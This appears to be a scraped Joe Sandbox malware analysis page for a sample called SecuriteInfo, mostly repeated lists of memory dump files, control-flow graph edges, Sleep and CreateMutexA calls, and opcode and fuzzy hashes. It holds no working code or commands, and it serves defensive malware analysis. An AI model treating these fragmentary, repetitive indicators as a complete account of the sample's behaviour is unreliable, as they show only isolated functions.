                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 002939ccdb2d5c9684caef4d73aac8bc22e8743212b25dca7225fda4210323cc
                                                                                                                                                                                                                                        • Instruction ID: ad8e59e2bbda7e1800b019f19c598c8dfb79e4cbdf2a898e4b9c68547b868d24
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 002939ccdb2d5c9684caef4d73aac8bc22e8743212b25dca7225fda4210323cc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90313B717001449BFB18FB78CD897ADB7F2DB85314F208299E411AB3E2CB759980C752
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B8A152 Relevance: 3.1, APIs: 2, Instructions: 122sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 826 b8a152-b8a172 830 b8a1a0-b8a1bc 826->830 831 b8a174-b8a180 826->831 834 b8a1ea-b8a209 830->834 835 b8a1be-b8a1ca 830->835 832 b8a182-b8a190 831->832 833 b8a196-b8a19d call b9ecf8 831->833 832->833 838 b8a419-b8a466 call bb82fa * 2 Sleep CreateMutexA 832->838 833->830 836 b8a20b-b8a217 834->836 837 b8a237-b8a3e6 call b99750 834->837 840 b8a1cc-b8a1da 835->840 841 b8a1e0-b8a1e7 call b9ecf8 835->841 842 b8a219-b8a227 836->842 843 b8a22d-b8a234 call b9ecf8 836->843 840->838 840->841 841->834 842->838 842->843 843->837
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 81507289ca1da1331fb0db8ffa613b45c469983ab3ca7945b9da05ab7ad3a787
                                                                                                                                                                                                                                        • Instruction ID: fc438253f41da5b8d7df66146bbeb65a7cf53882c25e7f63a4941b437d9f683f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81507289ca1da1331fb0db8ffa613b45c469983ab3ca7945b9da05ab7ad3a787
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 853126717001449BFB18FB68CD897ADBBF2DB86314F248299E421AB3E2C7759980C752
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B895B9 Relevance: 3.1, APIs: 2, Instructions: 95sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 19af3da15f18dc92c65e5aaba9c1c14800f36f65b64cbb4410d6c28dc2172bb3
                                                                                                                                                                                                                                        • Instruction ID: c0a87dd15917c3d33747bdca2daf20093c46e75cd0b42a82f66cbd9d2e351da4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19af3da15f18dc92c65e5aaba9c1c14800f36f65b64cbb4410d6c28dc2172bb3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA11AB7231020497FB24AF68CD8977CB7E1EB85310F244299E4289B7E1DB799440CB42
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B89E1F Relevance: 3.1, APIs: 2, Instructions: 91sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 909 b89e1f-b89e2b 910 b89e2d-b89e3b 909->910 911 b89e41-b89e6a call b9ecf8 909->911 910->911 912 b8a40a 910->912 917 b89e98-b8a3e6 call b99750 911->917 918 b89e6c-b89e78 911->918 915 b8a423-b8a466 Sleep CreateMutexA 912->915 916 b8a40a call bb82fa 912->916 916->915 919 b89e7a-b89e88 918->919 920 b89e8e-b89e95 call b9ecf8 918->920 919->912 919->920 920->917
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: e870c644c2620b4e208ea33b1bbec7f634fcd3e6b9bb6d186c10d8868cedf7da
                                                                                                                                                                                                                                        • Instruction ID: 4613ff35ce02be50544959291c3de81f8051b31d7ed98d7a68babedb5a785001
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e870c644c2620b4e208ea33b1bbec7f634fcd3e6b9bb6d186c10d8868cedf7da
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32216D727002449BFF18EB68DC8977CBBE1EB85311F2442ADE415AB3E1CB759580C751
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B8A326 Relevance: 3.1, APIs: 2, Instructions: 91sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
